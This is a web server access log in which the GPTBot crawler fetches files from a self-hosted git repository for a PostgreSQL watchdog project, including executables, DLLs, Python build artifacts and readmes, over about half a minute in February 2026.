-[17/Feb/2026:13:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10379] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 378858] [Gzip 29.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:13:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build" [Client 74.7.227.38] [Length 10383] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build" -[17/Feb/2026:13:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 252268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:13:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 63765] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:13:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:13:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10836] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:13:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:13:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 118020] [Gzip 19.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:13:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10930] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10997] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 299024] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:13:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 166070] [Gzip 20.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:13:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:13:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1135869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:13:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1765757] [Gzip 21.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:13:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 252268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:13:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9872] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:13:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 378829] [Gzip 29.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:13:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10188] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48958] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13037] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9543] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:13:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 525808] [Gzip 23.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:13:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 76184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:13:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11000] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10997] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21224] [Gzip 10.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 83209] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:13:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 10829] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:13:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 10159] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:13:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12072] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17181] [Gzip 9.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18351] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 10848] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:13:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] 